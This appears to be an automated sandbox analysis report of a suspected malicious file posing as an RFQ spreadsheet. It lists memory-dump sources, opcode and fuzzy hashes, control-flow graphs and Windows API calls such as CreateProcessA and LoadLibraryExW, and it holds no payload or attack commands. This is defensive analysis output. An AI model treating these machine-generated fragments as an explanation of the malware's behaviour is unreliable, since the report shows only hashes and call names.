                                              • Opcode ID: cf3cc3d74ec29ecde6e8dc6a521aaa760d5b0a9a47f2c8d4b70fc5280ba93917
                                              • Instruction ID: 663127472a35ea713c85555d74e478ac3cf8e6ae762263a2952943d24e2a7d6d
                                              • Opcode Fuzzy Hash: cf3cc3d74ec29ecde6e8dc6a521aaa760d5b0a9a47f2c8d4b70fc5280ba93917
                                              • Instruction Fuzzy Hash: 2032E275A00218DFDB65CFA8C944F99BBB2FF88300F1580E9E609AB276C7319995DF50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 536 6bf2106-6bf210a 537 6bf2acd-6bf2ae3 536->537 538 6bf210b-6bf2120 536->538 538->537 539 6bf2121-6bf212c 538->539 541 6bf2132-6bf213e 539->541 542 6bf214a-6bf2159 541->542 544 6bf21b8-6bf21bc 542->544 545 6bf2264-6bf22ce 544->545 546 6bf21c2-6bf21cb 544->546 545->537 584 6bf22d4-6bf281b 545->584 547 6bf20c6-6bf20d2 546->547 548 6bf21d1-6bf21e7 546->548 547->537 550 6bf20d8-6bf20e4 547->550 554 6bf2239-6bf224b 548->554 555 6bf21e9-6bf21ec 548->555 552 6bf215b-6bf2161 550->552 553 6bf20e6-6bf20fa 550->553 552->537 556 6bf2167-6bf217f 552->556 553->552 563 6bf20fc-6bf2105 553->563 564 6bf2a0c-6bf2ac2 554->564 565 6bf2251-6bf2261 554->565 555->537 558 6bf21f2-6bf222f 555->558 556->537 567 6bf2185-6bf21ad 556->567 558->545 580 6bf2231-6bf2237 558->580 563->536 564->537 567->544 580->554 580->555 662 6bf281d-6bf2827 584->662 663 6bf2832-6bf28c5 584->663 664 6bf282d 662->664 665 6bf28d0-6bf2963 662->665 663->665 666 6bf296e-6bf2a01 664->666 665->666 666->564
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: D
                                              • API String ID: 0-2746444292
                                              • Opcode ID: 4de358bbcffda8e19b11253a90a9346535ff292b81e6af05710efb2e37794b60
                                              • Instruction ID: d9acf3f769b51ab7180f4d322599f4cf7cf65ac3cb9fcc5b12d976fae766f57a
                                              • Opcode Fuzzy Hash: 4de358bbcffda8e19b11253a90a9346535ff292b81e6af05710efb2e37794b60
                                              • Instruction Fuzzy Hash: 6052C874A112298FCB64DF64C899A9DBBB6FF89300F1041D9D509AB3A5CF34AE81CF51
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 513f7a4b1b124edb427e082761e920d6f1252671547beb94ef9d4efb4b2ffa21
                                              • Instruction ID: fb1b5853bc4b9c140b5bb2a24edfa1adbaccf6df123b6c8642cd60f4f6951a6e
                                              • Opcode Fuzzy Hash: 513f7a4b1b124edb427e082761e920d6f1252671547beb94ef9d4efb4b2ffa21
                                              • Instruction Fuzzy Hash: CAB1D7B0D1422CCFEBA4DFA5D844BDEBBB2BF49314F1090A9D519A7261DB740A89CF41
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5f2c19613451fcc8868dac06762aa51db8d0d675677026353a49a2d41ba7ba4b
                                              • Instruction ID: 0415cb3616d4173fb3ce2d546b7174a6aa5adabcf376b2ea45e1e7ee6c46ec5c
                                              • Opcode Fuzzy Hash: 5f2c19613451fcc8868dac06762aa51db8d0d675677026353a49a2d41ba7ba4b
                                              • Instruction Fuzzy Hash: FFB1D7B0D1422CCFEBA4DFA5D844BDEBBB2BB49314F1090A9D519A7261DB740A89CF41
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2065694997.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_48c0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1c9c8f2945625e64a553eb44e072a1ba484e1d528e3e2145d0543ed8f9fa8e0c
                                              • Instruction ID: 241dacd5a129563e14bb2b42eb1bf365c0e6a9ec93185986db46e599ac82eafd
                                              • Opcode Fuzzy Hash: 1c9c8f2945625e64a553eb44e072a1ba484e1d528e3e2145d0543ed8f9fa8e0c
                                              • Instruction Fuzzy Hash: E1712971E046198BDB65CF66CC407E9F7B6BF99300F14D6AAD80DA6250EB709AC6CF40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2065694997.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_48c0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d05ef51defe837ecc9b42286e18698e4f45cfc01c2c78551a6d5c0ddbb18aaf6
                                              • Instruction ID: 2a44fecab3d911a54d8f52828b3492878b3b2832b09fbf18f9bc963e08fbb998
                                              • Opcode Fuzzy Hash: d05ef51defe837ecc9b42286e18698e4f45cfc01c2c78551a6d5c0ddbb18aaf6
                                              • Instruction Fuzzy Hash: 5C517A74E09208CBEB04CFE9D4447EDFBF5AB4A354F00A629D119E7255E738A94ADF40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2065694997.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_48c0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c08db525bb26394a343c36f965e3528c35b11b36556cc08dfc23c2218019e584
                                              • Instruction ID: bd3435d2205f08377d5e6c224328178d56b9a79a282508b28086093e26141da2
                                              • Opcode Fuzzy Hash: c08db525bb26394a343c36f965e3528c35b11b36556cc08dfc23c2218019e584
                                              • Instruction Fuzzy Hash: A6D01774E4D108CAC751AAA4A8181F5B2BCA71A30AF047E58880AD7201E230E8029E25

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 295 e9d370-e9d37c 296 e9d37e-e9d3bc 295->296 297 e9d3c5-e9d3ce 295->297 296->297 299 e9d35b-e9d36f 297->299 300 e9d3cf-e9d40f GetCurrentProcess 297->300 303 e9d418-e9d44c GetCurrentThread 300->303 304 e9d411-e9d417 300->304 305 e9d44e-e9d454 303->305 306 e9d455-e9d489 GetCurrentProcess 303->306 304->303 305->306 308 e9d48b-e9d491 306->308 309 e9d492-e9d4ad call e9d550 306->309 308->309 312 e9d4b3-e9d4e2 GetCurrentThreadId 309->312 313 e9d4eb-e9d54d 312->313 314 e9d4e4-e9d4ea 312->314 314->313
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 00E9D3FE
                                              • GetCurrentThread.KERNEL32 ref: 00E9D43B
                                              • GetCurrentProcess.KERNEL32 ref: 00E9D478
                                              • GetCurrentThreadId.KERNEL32 ref: 00E9D4D1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: f4efcfd68093a8a3d7404d96db4663bdbffd9cdc64f971a909d811251ec041bf
                                              • Instruction ID: 92debddbfa960ec264dce180079ac1c00c3d2883eab08977ec1055b79943532e
                                              • Opcode Fuzzy Hash: f4efcfd68093a8a3d7404d96db4663bdbffd9cdc64f971a909d811251ec041bf
                                              • Instruction Fuzzy Hash: FD5188B0904309CFDB15DFA9D948B9EBBF1EF88314F20845AE419B7361DB74A844CB66

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 321 e9d380-e9d40f GetCurrentProcess 325 e9d418-e9d44c GetCurrentThread 321->325 326 e9d411-e9d417 321->326 327 e9d44e-e9d454 325->327 328 e9d455-e9d489 GetCurrentProcess 325->328 326->325 327->328 330 e9d48b-e9d491 328->330 331 e9d492-e9d4ad call e9d550 328->331 330->331 334 e9d4b3-e9d4e2 GetCurrentThreadId 331->334 335 e9d4eb-e9d54d 334->335 336 e9d4e4-e9d4ea 334->336 336->335
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 00E9D3FE
                                              • GetCurrentThread.KERNEL32 ref: 00E9D43B
                                              • GetCurrentProcess.KERNEL32 ref: 00E9D478
                                              • GetCurrentThreadId.KERNEL32 ref: 00E9D4D1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: 9289f17601346fd655c8924bcbc2e788f99a6d7f4a58dda7c2913821db602d6a
                                              • Instruction ID: ef932f7aef73b601239ae8f8cd570c66a68ea0fbfae91cd7c7b2086863a948d1
                                              • Opcode Fuzzy Hash: 9289f17601346fd655c8924bcbc2e788f99a6d7f4a58dda7c2913821db602d6a
                                              • Instruction Fuzzy Hash: 175145B09003098FDB14DFA9D948BAEBBF5EF88314F208459E419B7361DB74A944CB61

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 691 6bffc48-6bffcdd 693 6bffcdf-6bffce9 691->693 694 6bffd16-6bffd36 691->694 693->694 695 6bffceb-6bffced 693->695 701 6bffd6f-6bffd9e 694->701 702 6bffd38-6bffd42 694->702 696 6bffcef-6bffcf9 695->696 697 6bffd10-6bffd13 695->697 699 6bffcfd-6bffd0c 696->699 700 6bffcfb 696->700 697->694 699->699 703 6bffd0e 699->703 700->699 708 6bffdd7-6bffe91 CreateProcessA 701->708 709 6bffda0-6bffdaa 701->709 702->701 704 6bffd44-6bffd46 702->704 703->697 706 6bffd69-6bffd6c 704->706 707 6bffd48-6bffd52 704->707 706->701 710 6bffd56-6bffd65 707->710 711 6bffd54 707->711 722 6bffe9a-6bfff20 708->722 723 6bffe93-6bffe99 708->723 709->708 712 6bffdac-6bffdae 709->712 710->710 713 6bffd67 710->713 711->710 714 6bffdd1-6bffdd4 712->714 715 6bffdb0-6bffdba 712->715 713->706 714->708 717 6bffdbe-6bffdcd 715->717 718 6bffdbc 715->718 717->717 719 6bffdcf 717->719 718->717 719->714 733 6bfff22-6bfff26 722->733 734 6bfff30-6bfff34 722->734 723->722 733->734 735 6bfff28 733->735 736 6bfff36-6bfff3a 734->736 737 6bfff44-6bfff48 734->737 735->734 736->737 738 6bfff3c 736->738 739 6bfff4a-6bfff4e 737->739 740 6bfff58-6bfff5c 737->740 738->737 739->740 741 6bfff50 739->741 742 6bfff6e-6bfff75 740->742 743 6bfff5e-6bfff64 740->743 741->740 744 6bfff8c 742->744 745 6bfff77-6bfff86 742->745 743->742 745->744
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06BFFE7E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 918b0d077f8f69c96447177ac270051f35f9c6cb74261028912883d3ab7de64e
                                              • Instruction ID: f3081a94820c007642e30a08cfeaca421bafb28e984b16b35cbe43ef0e3d03e9
                                              • Opcode Fuzzy Hash: 918b0d077f8f69c96447177ac270051f35f9c6cb74261028912883d3ab7de64e
                                              • Instruction Fuzzy Hash: 5F917EB1D102198FDF60CF68C840BEDBBB6FF49310F1485A9D908A72A4DB749989CF91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 747 e9b0e8-e9b0f7 748 e9b0f9-e9b106 call e99b54 747->748 749 e9b123-e9b127 747->749 754 e9b108 748->754 755 e9b11c 748->755 750 e9b129-e9b133 749->750 751 e9b13b-e9b17c 749->751 750->751 758 e9b189-e9b197 751->758 759 e9b17e-e9b186 751->759 802 e9b10e call e9b380 754->802 803 e9b10e call e9b370 754->803 755->749 761 e9b199-e9b19e 758->761 762 e9b1bb-e9b1bd 758->762 759->758 760 e9b114-e9b116 760->755 763 e9b258-e9b318 760->763 765 e9b1a9 761->765 766 e9b1a0-e9b1a7 call e9ad50 761->766 764 e9b1c0-e9b1c7 762->764 797 e9b31a-e9b31d 763->797 798 e9b320-e9b34b GetModuleHandleW 763->798 769 e9b1c9-e9b1d1 764->769 770 e9b1d4-e9b1db 764->770 768 e9b1ab-e9b1b9 765->768 766->768 768->764 769->770 772 e9b1e8-e9b1f1 call e9ad60 770->772 773 e9b1dd-e9b1e5 770->773 778 e9b1fe-e9b203 772->778 779 e9b1f3-e9b1fb 772->779 773->772 780 e9b221-e9b225 778->780 781 e9b205-e9b20c 778->781 779->778 804 e9b228 call e9b680 780->804 805 e9b228 call e9b650 780->805 781->780 783 e9b20e-e9b21e call e9ad70 call e9ad80 781->783 783->780 786 e9b22b-e9b22e 788 e9b251-e9b257 786->788 789 e9b230-e9b24e 786->789 789->788 797->798 799 e9b34d-e9b353 798->799 800 e9b354-e9b368 798->800 799->800 802->760 803->760 804->786 805->786
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00E9B33E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0

                                              Control-flow Graph

                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 00E959A9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0

                                              Control-flow Graph

                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 00E959A9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0

                                              Control-flow Graph

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E9D64F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0

                                              Control-flow Graph

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E9D64F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E9B3B9,00000800,00000000,00000000), ref: 00E9B5CA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E9B3B9,00000800,00000000,00000000), ref: 00E9B5CA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 048C44F5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2065694997.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_48c0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 048C44F5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2065694997.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_48c0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00E9B33E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063223758.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e4d000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063223758.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e4d000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063223758.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e4d000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063223758.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e4d000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063223758.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e4d000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4|hq$4|hq
                                              • API String ID: 0-2328431178
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2065694997.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_48c0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 78178a197f679a21cad13a858b570070a2073e152a6089c7842db8a814bfdab9
                                              • Instruction ID: 1b28cfcc527e73d75a22f844ca1506625217e97f34fcdc2adf45e7668e6554b7
                                              • Opcode Fuzzy Hash: 78178a197f679a21cad13a858b570070a2073e152a6089c7842db8a814bfdab9
                                              • Instruction Fuzzy Hash: 8241E474E015089FDB48DFAAD980AAEFBF2EFC8310F14C169D418A7365DB349946CB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 467121cc26a0dd4434cef52463f0335f839a00cbd632fb91913617bba1596af1
                                              • Instruction ID: 707ff755fcf879aee7741e665a35df9228df408eaf2ee2946f5a8050dddb24c4
                                              • Opcode Fuzzy Hash: 467121cc26a0dd4434cef52463f0335f839a00cbd632fb91913617bba1596af1
                                              • Instruction Fuzzy Hash: 2F41A9B1E046188BEB28CF6BD8407CABBF7AFC9300F14D1AAD509A7225DB3059858F51
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2065694997.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_48c0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 48a1a0374cf04033d2b39a2c1cf2034995cb0c70b56677c6476e85c627cd5010
                                              • Instruction ID: 72ca93c8b127da8242becd1708c158833b0904f9cd55f288da468187f353c960
                                              • Opcode Fuzzy Hash: 48a1a0374cf04033d2b39a2c1cf2034995cb0c70b56677c6476e85c627cd5010
                                              • Instruction Fuzzy Hash: 9421DA71E056288BEB18CF6B88047DEFAF7AFC9300F04C5BAC80DA6255DB345986CE51

                                              Execution Graph

                                              Execution Coverage:9.3%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:73
                                              Total number of Limit Nodes:9
                                              execution_graph (rendered graph data; node/edge listing omitted). Recoverable structure: entry 681c2d0 -> 681c2e0 -> 681aadc -> 71c0918/71c0928 -> 71c0b90/71c0ba0 -> 71c0bd0/71c0be0 -> 71c0558 -> 71c0e30 (LoadLibraryExW); entry 14f0848 -> 14f133f/14f1457 -> 14f7128 -> 66dd2a0/66dd2b0 and 66de248/66de258 -> 66dd4f0/66dd500 (GlobalMemoryStatusEx, three calls per node).
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 17c2cb497e53914948d3d35d39f2f0bbef91603ce1714042ad4c05517c67d85e
                                              • Instruction ID: 7c84901616e735bfcc96ebd449d14dcc1b327c3fd8d23f17ad6305e438f62dcd
                                              • Opcode Fuzzy Hash: 17c2cb497e53914948d3d35d39f2f0bbef91603ce1714042ad4c05517c67d85e
                                              • Instruction Fuzzy Hash: 85631C31D10B1A8ECB51EF68C8805A9F7B1FF99300F15C79AE55877221EB70AAD5CB81
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cda34cdb024ce7ec1f293077ec51c08b4aba910fc7d2a512e2019b22886fc478
                                              • Instruction ID: d35affb160c6369c93fdfd272a897f124f2f2e681769e7161e9aaddf9f367c54
                                              • Opcode Fuzzy Hash: cda34cdb024ce7ec1f293077ec51c08b4aba910fc7d2a512e2019b22886fc478
                                              • Instruction Fuzzy Hash: 7A331F31D107198EDB11EF68C8846AEF7B1FF99300F15C79AE558A7221EB70AAC5CB41
                                              Memory Dump Source
